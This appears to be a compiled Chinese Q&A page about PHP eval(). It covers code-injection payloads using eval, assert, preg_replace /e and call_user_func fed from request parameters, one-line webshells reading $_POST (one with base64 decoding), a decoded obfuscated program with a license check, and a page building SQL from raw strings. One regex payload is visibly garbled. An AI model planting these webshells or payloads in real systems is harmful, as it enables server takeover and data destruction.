phpeval
㈠ Payload:< php eval('phpinfo();');>可否为php代码执行
代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。
危险函数执行PHP代码的有:
eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(), create_function(), array_map()等。
1.eval()和assert()函数本身就可动态执行代码,其参数就是PHP代码
payload: <? eval('phpinfo();');?>
2.preg_replace()函数的第一个参数存在e修饰符时,第二个参数和第三个参数可能当作PHP代码被执行
preg_replace漏洞触发有两个前提:
第一个参数需要e标识符,有了它可以执行第二个参数的命令
第一个参数需要在第三个参数中的中有匹配,不然echo会返回第三个参数而不执行命令
//echo preg_replace(‘/test/e’, ‘phpinfo()’, ‘just test’);这样是可以执行命令的
//echo preg_replace(‘/test/e’, ‘phpinfo()’, ‘just tesxt’); 或者echo preg_replace(‘/tesxt/e’, ‘phpinfo()’, ‘just test’); 这两种没有匹配上,所以返回值是第三个参数,不会执行命令
payload:
<?php preg_replace('/
(.∗)
(.∗)
/e','\\1','$_GET['a']);?>
请求1.php?a=[phpinfo()]
3.call_user_func()和array_map()等函数的作用就是调用其他函数,并将第二个参数作为回调函数的参数
payload:
<?php $b='phpinfo()'; call_user_func($_GET['a'],$b);?>
请求1.php?a=assert, 则调用了assert函数
㈡ 网站中出现<php eval($_POST['posha']);> 这段代码什么意思
一句话木马
$_POST['posha']);是获取post变量
而eval是一个php函数,他可以将字符串中的符合php语法的字符当做php代码进行执行
假如他在表单域中写上:unlink('index.php')
然后发送给这个文件,那么,你的index.php将被删除
㈢ PHP解密 eval( base64_decode
不错,回了无数多这种所谓的“解密”帖子,总算看见有人知道怎么搞了,高兴ing
等效的代码如下:
<?php
class MoleObject extends MasterObject
{
var $FormHandler = null;
var $IoHandler=null;
function MoleObject($config)
{
error_reporting(0);
$this->MasterObject($config);if(18869722 && !defined("LICENSE_VAR_CODE"))exit(86707181);if(substr(md5_FILE("./include/function/global.func.php"),3,25)!=substr("",3,25))
{
error_reporting(0);
ob_clean();
for($s=11677216;$s>0;$s*=65085748){;}
}
$this->FormHandler=new FormHandler;
include_once(LIB_PATH.'io.han.php');
$this->IoHandler=new IoHandler;
$this->Execute();
}
function Execute()
{
switch($this->Code)
{
case 'modify_normal':
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
case 'domodify_normal':
include(MOD_PATH.(($_obfuscate_shAHJlhD4Ndn=2147483647 & -1818658825)%27).'/'.$_obfuscate_shAHJlhD4Ndn.'.php');
break;
case 'modify_credits':
include(MOD_PATH.(($_obfuscate_2GWWxUEK7ztH=2147483647 & 890135736)%27).'/'.$_obfuscate_2GWWxUEK7ztH.'.php');
break;
case 'domodify_credits':
include(MOD_PATH.(($_obfuscate_JQQuH5KF9jyy=2147483647 & -679717690)%27).'/'.$_obfuscate_JQQuH5KF9jyy.'.php');
break;
case 'modify_header_menu':
$this->ModifyHeaderMenu();
break;
case 'domodify_header_menu':
$this->DoModifyHeaderMenu();
break;
case 'modify_header_sub_menu':
$this->ModifyHeaderSubMenu();
break;
case 'modify_header_sub_menu':
$this->DoModifyHeaderSubMenu();
break;
case 'modify_rewrite':
include(MOD_PATH.(($_obfuscate_r4cRb866G31X=2147483647 & -374888374)%27).'/'.$_obfuscate_r4cRb866G31X.'.php');
break;
case 'domodify_rewrite':
include(MOD_PATH.(($_obfuscate_kFjsOxTxxTm5=2147483647 & 1196688474)%27).'/'.$_obfuscate_kFjsOxTxxTm5.'.php');
break;
case 'modify_remote':
include(MOD_PATH.(($_obfuscate_dmnWYBFfwPZy=2147483647 & -1814999975)%27).'/'.$_obfuscate_dmnWYBFfwPZy.'.php');
break;
case 'domodify_remote':
include(MOD_PATH.(($_obfuscate_M9T56w4hBGsk=2147483647 & 332943561)%27).'/'.$_obfuscate_M9T56w4hBGsk.'.php');
break;
case 'modify_filter':
include(MOD_PATH.(($_obfuscate_gWUtSmmgjtIp=2147483647 & -962910372)%27).'/'.$_obfuscate_gWUtSmmgjtIp.'.php');
break;
case 'domodify_filter':
include(MOD_PATH.(($_obfuscate_robepjimEUCI=2147483647 & -659464081)%27).'/'.$_obfuscate_robepjimEUCI.'.php');
break;
case 'modify_latest_search':
$this->ModifyLatestSearch();
break;
case 'domodify_latest_search':
$this->DoModifyLatestSearch();
break;
case 'modify_access':
include(MOD_PATH.(($_obfuscate_RFZWBU9N2FLm=2147483647 & 975168040)%27).'/'.$_obfuscate_RFZWBU9N2FLm.'.php');
break;
case 'domodify_access':
include(MOD_PATH.(($_obfuscate_Ig1RqxiYeBex=2147483647 & 1791127976)%27).'/'.$_obfuscate_Ig1RqxiYeBex.'.php');
break;
case 'modify_seccode':
include(MOD_PATH.(($_obfuscate_yNun8HVOF41M=2147483647 & -1132193474)%27).'/'.$_obfuscate_yNun8HVOF41M.'.php');
break;
case 'do_modify_seccode':
include(MOD_PATH.(($_obfuscate_RqGJmKOedTlZ=2147483647 & 305153614)%27).'/'.$_obfuscate_RqGJmKOedTlZ.'.php');
break;
case 'modify_smtp':
include(MOD_PATH.(($_obfuscate_GZvqIIYIxcwR=2147483647 & -2091071938)%27).'/'.$_obfuscate_GZvqIIYIxcwR.'.php');
break;
case 'do_modify_smtp':
include(MOD_PATH.(($_obfuscate_eUDxyTQSnmWA=2147483647 & -25441582)%27).'/'.$_obfuscate_eUDxyTQSnmWA.'.php');
break;
case 'modify_right':
include(MOD_PATH.(($_obfuscate_L6pnR8LaKmYu=2147483647 & -29905623)%27).'/'.$_obfuscate_L6pnR8LaKmYu.'.php');
break;
case 'do_modify_right':
include(MOD_PATH.(($_obfuscate_umtTsFNTDQ2i=2147483647 & -1934952338)%27).'/'.$_obfuscate_umtTsFNTDQ2i.'.php');
break;
case 'modify_shortcut':
include(MOD_PATH.(($_obfuscate_Po7xayJ0iz3x=2147483647 & -371519643)%27).'/'.$_obfuscate_Po7xayJ0iz3x.'.php');
break;
case 'do_modify_shortcut':
include(MOD_PATH.(($_obfuscate_cFcMlzVkWpGo=2147483647 & 1925297631)%27).'/'.$_obfuscate_cFcMlzVkWpGo.'.php');
break;
default:
include(MOD_PATH.(($_obfuscate_pp3FQ7Ohubz7=2147483647 & -78165835)%27).'/'.$_obfuscate_pp3FQ7Ohubz7.'.php');
break;
}
}
function _saveRewriteConfig($domain,$name,$config)
{
return include(MOD_PATH.(($_obfuscate_OeWNnsry3PMy=2147483647 & -1082551710)%27).'/'.$_obfuscate_OeWNnsry3PMy.'.php');
}
function _writeHtaccess($abs_path)
{
return include(MOD_PATH.(($_obfuscate_x8rztwAyS8f1=2147483647 & -315296549)%27).'/'.$_obfuscate_x8rztwAyS8f1.'.php');
}
}
?>
注意看13行,这里其实是在检测另外的文件是否被解密,注意是否有其它文件类似的办法来检测你这个程序。
㈣ php eval(gzinflate(base64_decode
把eval换为echo,运行一下就能现实解密后的内容。你压缩包里面的1.txt文件解密后的内容如下:
<?php
require "../include/function.php";
chkuser();
if(isset($_GET['Page']))
{
$page=$_GET['Page'];
}
else
{
$page="1";
}
if(isset($_GET['kind']))
{
$kind=$_GET['kind'];
}
else
{
$kind="task";
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML
xmlns="http://www.w3.org/1999/xhtml"><HEAD><TITLE>任务管理-<?php echo $site_tit; ?></TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content=<?php echo $site_des; ?> name=description>
<META content=<?php echo $site_key; ?> name=keywords>
<?php
require_once "../head1.php";
?>
<script>
function link(o)
{
var link1=document.getElementById("link"+o);
clipboardData.setData('Text',link1.value);
alert("宝贝地址已经复制到剪贴板中,\n请打开一个新的浏览窗口,\n把地址粘贴到浏览器的地址栏中您就可以访问此宝贝了!");
window.open();
}
</script>
<META content="MSHTML 6.00.2900.3429" name=GENERATOR></HEAD>
<BODY class=FullWidth>
<DIV class=main>
<DIV class=sell_new>
<DIV class=sell_left>
<div style="width:100%;background:#fff;text-align:center">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="15"></td>
<td height="15"></td>
</tr>
<tr>
<td></td>
<td><div id="nltit">您的位置: <a href="/index.html">首页</a> >> 任务管理 >>
<?php
if($kind=="task"){echo "我发布的任务";}
else {echo "我接手的任务";}
?>
</div>
<div style="margin-top:10px;width:650px">
<table width="95%" border="0" cellspacing="0" cellpadding="0">
<tr align="left">
<td height="25" colspan="8" style="border-bottom:1px dotted #ccc">任务分类:
<a href="task_list.php"><font color="#000000">我发布的任务</font></a> |
<a href="task_list.php?kind=witkey"><font color="#000000">我接手的任务</font></a>
</td>
</tr>
<tr align="center">
<td height="25">任务编号</td>
<td bgcolor="#efefef">发布用户</td>
<td height="25">宝贝地址</td>
<td height="25" bgcolor="#efefef">到期时间</td>
<td height="25">接手用户</td>
<td height="25" bgcolor="#efefef">任务来自</td>
<td>任务保证金</td>
<td bgcolor="#efefef">任务状态</td>
</tr>
<?php
$pagenum=15;
if($kind=="task"){
$sql="select top ".$pagenum." * from task_list where id not in(select Top ".strval($pagenum*($page-1))." id from task_list where taskuser='".$_SESSION['szuser']."') and taskuser='".$_SESSION['szuser']."'";
$rs=mssql_query($sql);
$all=execonn("select count(id) from task_list where taskuser='".$_SESSION['szuser']."'");
$pageacount= ceil($all/$pagenum);
}
if($kind=="witkey"){
$sql="select top ".$pagenum." * from task_list where id not in(select Top ".strval($pagenum*($page-1))." id from task_list where taskeruser='".$_SESSION['szuser']."') and taskeruser='".$_SESSION['szuser']."'";
$rs=mssql_query($sql);
$all=execonn("select count(id) from task_list where taskeruser='".$_SESSION['szuser']."'");
$pageacount= ceil($all/$pagenum);
}
while($row=mssql_fetch_array($rs))
{
?>
<tr align="center">
<td height="25"><a href="viewtask.php?tid=<?php echo $row['id']; ?>" target="_blank" title="点击查看任务详情"><?php echo $row['taskno']; ?></a></td>
<td bgcolor="#efefef"><a href="viewuser.php?uid=<?php echo $row['taskuser']; ?>" target="_blank" title="点击查看用户资料"><?php echo $row['taskuser']; ?></a></td>
<td height="25"><a href="#" onclick="link('<?php echo $row['id']; ?>');"><font color="#FF0000">点击这里</font></a>
<input name="link<?php echo $row['id']; ?>" type="hidden" value="<?php echo $row['shopurl']; ?>">
</td>
<td height="25" bgcolor="#efefef"><?php echo $row['enddate']; ?></td>
<td height="25"><a href="viewuser.php?uid=<?php echo $row['taskeruser']; ?>" target="_blank" title="点击查看用户资料"><?php echo $row['taskeruser']; ?></a></td>
<td height="25" bgcolor="#efefef"><?php echo $row['taskfrom']; ?></td>
<td><?php echo $row['taskmoney']; ?>元</td>
<td bgcolor="#efefef"><a href="viewtask.php?tid=<?php echo $row['id']; ?>" target="_blank" title="点击查看任务详情">
<?php if($kind=="task"){ ?>
<?php echo getstat2($row['taskstat'],0); ?>
<?php }
else { ?>
<?php echo getstat2($row['taskstat'],1); ?>
<?php } ?>
</a></td>
</tr>
<?php } ?>
<tr align="center">
<td height="25" colspan="8">
<?php
$outstr="";
$outstr.="共".$pageacount."页 ";
$p1=intval($page);
$p2=intval($pageacount);
if($page=="1")
{
$outstr=$outstr."首页 上一页";
}
else
{
$outstr=$outstr."<a href=task_list.php?kind=".$kind."&Page=1>首页</a> <a href=task_list.php?kind=".$kind."&Page=".strval($p1-1).">上一页</a>";
}
for($i=1;$i<=$p2;$i++)
{
$outstr=$outstr." <a href=task_list.php?kind=".$kind."&Page=".$i.">".$i."</a> ";
}
if(strval($page)==strval($pageacount))
{
$outstr=$outstr."下一页 末页";
}
else {
$outstr=$outstr."<a href=task_list.php?kind=".$kind."&Page=".strval($p1+1).">下一页</a> <a href=task_list.php?kind=".$kind."&Page=".strval($p2).">末页</a>";
}
echo $outstr;
?>
</td>
</tr>
</table>
</div>
</td>
</tr>
</table><br><br>
</div>
<I class="sell_left_angle sell_left_tl"></I><I
class="sell_left_angle sell_left_tr"></I><I
class="sell_left_angle sell_left_bl"></I><I
class="sell_left_angle sell_left_br"></I> </DIV>
<?php
require_once "right.php";
require_once "../foot.php";
mssql_close();
?>
</BODY></HTML>
㈤ php eval()
你这样理解
括号里$前面加入\是为了“转译”,这样的话$str就不会变成真实的字符串
eval ("\$str = \"$str\";"); 等同于 $str = "This is a $string with my $name in it.<br>"; 等同于 $str = "This is a cup with my coffee in it.<br>";
㈥ php eval怎样执行系统命令
eval — 把字符串作为PHP代码执行
说明
mixedeval( string $code_str )
把字符串code_str作为PHP代码执行。 除了其他,该函数能够执行储存于数据库文本字段内的PHP代码。
使用eval()时需注意几个因素:注意字符必须是有效的PHP代码,包括结尾的分号,以不至于解释器在eval()之后退出。并且正确地转义code_str中的东西。你可以使用一个PHP闭合标签来混合输出HTML和PHP代码。
同时需注意eval中的变量会被保留在之后的主脚本中。
参数
code_str需要被执行的字符串code_str不能包含 PHP Opening tags。
return语句会立即中止当前字符串的执行。
返回值
eval()返回NULL,除非在执行的代码中return了一个值,函数返回该值。 如果在执行的代码中有一个解析错误,eval()返回FALSE,之后的代码将正常执行。无法使用 set_error_handler() 捕获eval()中的解析错误。
范例
Example #1eval()例子 - 简单的文本合并
<?php
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
echo $str. "\n";
eval("\$str = \"$str\";");
echo $str. "\n";
?>
以上例程会输出:
This is a $string with my $name in it.This is a cup with my coffee in it.
Note: 因为是一个语言构造器而不是一个函数,不能被 可变函数 调用。
Tip和直接将结果输出到浏览器一样,可使用输出控制函数来捕获当前函数的输出,然后(例如)保存到一个 string 中。
Note:
如果在执行的代码中产生了一个致命的错误(fatal error),整个脚本会退出。
Linux 中
shell中的eval命令将会首先扫描命令行进行所有的替换,然后再执行命令。该命令使用于那些一次扫描无法实现其功能的变量。该命令对变量进行两次扫描。这些需要进行两次扫描的变量有时候被称为复杂变量。
例如
$:cat ext
count=3
cmd=echo
cmd="$cmd \$$count"
ext 11 22 33
此时cmd=" echo $3"
eval $cmd 等价于 "echo 33 "
㈦ 这句怎么解`就一句 <php eval (base64_decode($_POST["php"]));>
将post方式提交的变量$_POST['php']使用base64_decode()进行解码($_POST['php']应该是MIME base64 编码格式),并将解码之后的变量按照PHP语句的方式运行
㈧ 关于php的eval()'d code LINE: 1问题
$result2=eval("$Image::thumb($logo_path,$newpath2,'',130,130);");貌似多了一个分号
$result2=eval("$Image::thumb($logo_path,$newpath2,'',130,130)");
㈨ PHP eval 传入的参数是变量 怎么处理转义
eval()将传出入的字符串先当php语句来处理的
<?php
$str='echo"hello";';//这里是单引号引起语句,使用双引号注意字符被转义的问题
$content=eval($str);//类似于给里面的话加了<?php?>
//eval($str)相当于<?phpecho"hello";?>
//执行结果:hello而不是echo"hello";
?>